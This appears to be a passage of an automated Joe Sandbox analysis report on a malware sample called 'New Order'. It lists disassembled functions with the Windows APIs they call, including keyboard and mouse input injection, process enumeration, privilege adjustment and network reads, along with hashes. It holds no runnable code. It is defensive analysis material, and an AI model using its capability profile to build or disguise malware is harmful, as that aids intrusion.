Function 002FE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002FE645

Strings

1#SNAN, xrefs: 002FF844
1#INF, xrefs: 002FF852
1#QNAN, xrefs: 002FF84B
1#IND, xrefs: 002FF83D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f25efa86450dd7a69f9d76e3be97caa3a16ead199388ae7814c6080e84663b48
Instruction ID: f755368e42c69d6b5cb431937acec246cd2f1902752552343c2dbfc63faef54d
Opcode Fuzzy Hash: f25efa86450dd7a69f9d76e3be97caa3a16ead199388ae7814c6080e84663b48
Instruction Fuzzy Hash: B5C25871E242298BDF65CE289D407EAF3B9EB44384F1541FADA0DE7250E774AE918F40

Function 0033648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 003364DC
CoInitialize.OLE32(00000000), ref: 00336639
CoCreateInstance.OLE32(0035FCF8,00000000,00000001,0035FB68,?), ref: 00336650
CoUninitialize.OLE32 ref: 003368D4

Strings

.lnk, xrefs: 003364BA, 00336524, 003365E0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 3193aca999ac0a4a60c64c455440d2a13a0619d0eeabb5bd9f6be6892221b38e
Instruction ID: 9a53ec947fa9bb6968157a1ab7d87ac9dc90683377d8154413ed1aaafdfc78e1
Opcode Fuzzy Hash: 3193aca999ac0a4a60c64c455440d2a13a0619d0eeabb5bd9f6be6892221b38e
Instruction Fuzzy Hash: 2AD13971518301AFD305EF24C881E6BB7E8FF99704F108A6DF5958B2A1EB70E945CB92

Function 003422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 003422E8

Part of subcall function 0033E4EC: GetWindowRect.USER32(?,?), ref: 0033E504

GetDesktopWindow.USER32 ref: 00342312
GetWindowRect.USER32(00000000), ref: 00342319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00342355
GetCursorPos.USER32(?), ref: 00342381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003423DF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 15e5080d7ff39407a192a5a27ce842ef5a45934f9e9fb35154fb6e0129dd06c6
Instruction ID: 814eb31fc6a94ae7be49b3f0266affc9a64b1d95fcf2b2408fcbfc8c225a2eae
Opcode Fuzzy Hash: 15e5080d7ff39407a192a5a27ce842ef5a45934f9e9fb35154fb6e0129dd06c6
Instruction Fuzzy Hash: 6E31DE72504315AFC722DF55D849B9BBBEDFF88318F400919F985AB191DB34EA08CB92

Function 00339B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00339B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00339C8B

Part of subcall function 00333874: GetInputState.USER32 ref: 003338CB
Part of subcall function 00333874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00333966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00339BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00339C75

Strings

*.*, xrefs: 00339B5D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: d718e6920b0bf0b472b6fb99a735629e62b3b7f395bd0b3a81a1489e2e578411
Instruction ID: a650d10e0d1ecda09718c06967418924cf2985f85e6e0a460d790b12ba75fb91
Opcode Fuzzy Hash: d718e6920b0bf0b472b6fb99a735629e62b3b7f395bd0b3a81a1489e2e578411
Instruction Fuzzy Hash: 9641827191420ADFCF16DF64C889BEEBBB8EF05315F14419AE805A31A1EB709E94CF60

Function 002D997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 002D9A4E
GetSysColor.USER32(0000000F), ref: 002D9B23
SetBkColor.GDI32(?,00000000), ref: 002D9B36

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 9971e1ecca850fc16aa8c021055291903144001a6700fcf188099999ffe08808
Instruction ID: e272d69393a4e633165551e27d5ce651643285f9c49617a3a06ffd485d94f58f
Opcode Fuzzy Hash: 9971e1ecca850fc16aa8c021055291903144001a6700fcf188099999ffe08808
Instruction Fuzzy Hash: 86A13C71238501AEE72BAE3C8C58EFB26ADDB46344F19020BF402DA7D1DA659DE1D271

Function 00341806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0034307A
Part of subcall function 0034304E: _wcslen.LIBCMT ref: 0034309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0034185D
WSAGetLastError.WSOCK32 ref: 00341884
bind.WSOCK32(00000000,?,00000010), ref: 003418DB
WSAGetLastError.WSOCK32 ref: 003418E6
closesocket.WSOCK32(00000000), ref: 00341915

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: e33724347de8351f3873eedce049964407b2ab5fed56b513237bba5220bccd7b
Instruction ID: e2abd6a7c01dec8cbfd7c3748f443635ad7f28329560945cd4a4dda5095a127b
Opcode Fuzzy Hash: e33724347de8351f3873eedce049964407b2ab5fed56b513237bba5220bccd7b
Instruction Fuzzy Hash: 5351B271A10610AFEB11AF24C886F2A77E5EB44718F58819CF90A9F3D3C771AD41CBA1

Function 00351C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00351CC0
IsWindowEnabled.USER32 ref: 00351CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00351CDB
IsIconic.USER32 ref: 00351CE9
IsZoomed.USER32 ref: 00351CF7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 61dc5b6b358f62c4fdba5fd3f5053e3b83ac890eca422221c3103e66c6a95226
Instruction ID: 57b078ccd217d6470860c036ae78dbab7ca1986245ec0b3b78ccacfa0342dea4
Opcode Fuzzy Hash: 61dc5b6b358f62c4fdba5fd3f5053e3b83ac890eca422221c3103e66c6a95226
Instruction Fuzzy Hash: 3A2194317402105FD7228F1AC884F667BE9AF95316F1A805CEC458B361DB72EC46CB90

Function 002C8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 002C83E8
VUUU, xrefs: 002C83FA
VUUU, xrefs: 00305DF0
ERCP, xrefs: 002C813C
VUUU, xrefs: 002C843C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 8adaf1e30073fb5d8678373ae5b9b155d4a92b5b16711abd6fe8554a27c5f89c
Instruction ID: e971170142f18bf040791b076abe3f7ac42e3b4a398396aff165b982bd369bd5
Opcode Fuzzy Hash: 8adaf1e30073fb5d8678373ae5b9b155d4a92b5b16711abd6fe8554a27c5f89c
Instruction Fuzzy Hash: E6A2C270E1161ACBDF25CF58C851BAEB7B1BF44310F2582AAD815A7285EB709DA1CF90

Function 00328298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 003282AA

Strings

|, xrefs: 003282DA
tb8, xrefs: 003284F4
(, xrefs: 003282F0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: lstrlen
String ID: ($tb8$|
API String ID: 1659193697-3797810875
Opcode ID: 6cb36595022dda4e10ebd4fbc6db6c7cbd69e046dcb30ba0fd648ace9a837db2
Instruction ID: 26056b7d730e784d3bb9e81283b029fca1e240d46b7097a74bff849d26732812
Opcode Fuzzy Hash: 6cb36595022dda4e10ebd4fbc6db6c7cbd69e046dcb30ba0fd648ace9a837db2
Instruction Fuzzy Hash: DB324478A017159FCB29CF19D081A6AB7F0FF48710B15C46EE59ADB7A1EB70E941CB40

Function 0034A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0034A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0034A6BA

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0034A79C
CloseHandle.KERNEL32(00000000), ref: 0034A7AB

Part of subcall function 002DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00303303,?), ref: 002DCE8A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: abdcd19c635e3cdc6b28f4afcb10cff11939dc2446bcda1b46aa3404d9c8a969
Instruction ID: 3a411a5f800a269bfac7917c780039e0f79f6282d2f915c0c98b33a010f934aa
Opcode Fuzzy Hash: abdcd19c635e3cdc6b28f4afcb10cff11939dc2446bcda1b46aa3404d9c8a969
Instruction Fuzzy Hash: 195118715187009FD711EF24C886E6BBBE8EF89754F404A1DF585972A2EB30E914CF92

Function 0032AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0032AAAC
SetKeyboardState.USER32(00000080), ref: 0032AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0032AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0032AB88

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 37cf4b49e5714b501a914face6bfe00c6f4a33999eaf5de77f6ac89bd494f5cf
Instruction ID: bc9971279e9d888a7b8fd10b27e0f47935b5bea75c853faa43a218beaca653aa
Opcode Fuzzy Hash: 37cf4b49e5714b501a914face6bfe00c6f4a33999eaf5de77f6ac89bd494f5cf
Instruction Fuzzy Hash: 06311830A40B28AFFF378A64AC05BFA7BAAAF44310F04421AF181561E0D3758985C7A2

Function 0033CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0033CE89
GetLastError.KERNEL32(?,00000000), ref: 0033CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0033CEFE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: dab2e94e0af6fbab622f434318fcadaba7831155c4e185754c54b0eb4e212461
Instruction ID: 3e1ad5bec41ca86d240aa8d17d12e141c6a32363238a41325fd2fcc3689253c3
Opcode Fuzzy Hash: dab2e94e0af6fbab622f434318fcadaba7831155c4e185754c54b0eb4e212461
Instruction Fuzzy Hash: FC21CFB15203059FDB22DF65C988BA777FCEB00319F11541EE546E2161E774EE04CB50

Function 00335C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00335CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00335D17
FindClose.KERNEL32(?), ref: 00335D5F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: fe21b44595d450b9fa18ceee08338efa467dd2de13fe11a5886eb9846277379d
Instruction ID: 33ffc82c9922bfd553c482fb9e7d9f508d8884e73429190673afb4a115475d3b
Opcode Fuzzy Hash: fe21b44595d450b9fa18ceee08338efa467dd2de13fe11a5886eb9846277379d
Instruction Fuzzy Hash: 13518434614A019FC715DF28C484E9AB7E4FF09328F14865EE99A8B3A2CB30E905CF91

Function 002F2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 002F271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002F2724
UnhandledExceptionFilter.KERNEL32(?), ref: 002F2731

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 069030d3c56d6c8e8c31105edb3193adec6b880a496ae45f3ec28ee1598464f7
Instruction ID: 811b7316c8adfcf2322f986f5b54f7273572123c3457332f9f508662bbece305
Opcode Fuzzy Hash: 069030d3c56d6c8e8c31105edb3193adec6b880a496ae45f3ec28ee1598464f7
Instruction Fuzzy Hash: 1931E27495131CEBCB21DF68DD88798BBB8AF08310F5041EAE90CA6261E7709F958F44

Function 003351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003351DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00335238
SetErrorMode.KERNEL32(00000000), ref: 003352A1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 33018618bf835175c7d3d27ecec063180a007b22ab35dad232ca6b63ccc8f68e
Instruction ID: e3e704d25ab3ebce3c4fec373bca9f95c9e9fd6e6480728af2ca7f4dbd397504
Opcode Fuzzy Hash: 33018618bf835175c7d3d27ecec063180a007b22ab35dad232ca6b63ccc8f68e
Instruction Fuzzy Hash: BB314B75A106189FDB01DF54D884EAEBBB4FF48318F158499E805AB362DB31E856CB90

Function 003216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 002DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002E0668
Part of subcall function 002DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002E0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032173A
GetLastError.KERNEL32 ref: 0032174A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 4600b7204f3c5b59ba9d3795ce0644bde0845e2c6f211bb96b583c99453f6d88
Instruction ID: 81266f2ca2729c192453e263d70baaef070354195430bffbebe878a293996972
Opcode Fuzzy Hash: 4600b7204f3c5b59ba9d3795ce0644bde0845e2c6f211bb96b583c99453f6d88
Instruction Fuzzy Hash: 1411CEB2420308AFD718AF54ED86D6BB7BDFB44B24B20852EE05653291EB70FC41CA24

Function 0032D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0032D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0032D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0032D650

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: c4b7b0b672ed01876d21eee8a903d2ce2234afe65cec2720dada67e31cbb099a
Instruction ID: c7e54162d2b74e8a8b94cf784caf0d174c2a48e5eec20270e779d0f9bfd17021
Opcode Fuzzy Hash: c4b7b0b672ed01876d21eee8a903d2ce2234afe65cec2720dada67e31cbb099a
Instruction Fuzzy Hash: 33117C75E01328BFDB118F94AC44FAFBBBCEB45B50F108111F914E7290C2704A018BE1

Function 00321663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0032168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003216A1
FreeSid.ADVAPI32(?), ref: 003216B1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 513845be8c0f377c742f22081614047fe21bd45ee0f9d293fbd9057d70fb2289
Instruction ID: 3074d194102e90d357fc9c138cae871802aa2767b46635302abdf96f490b9c01
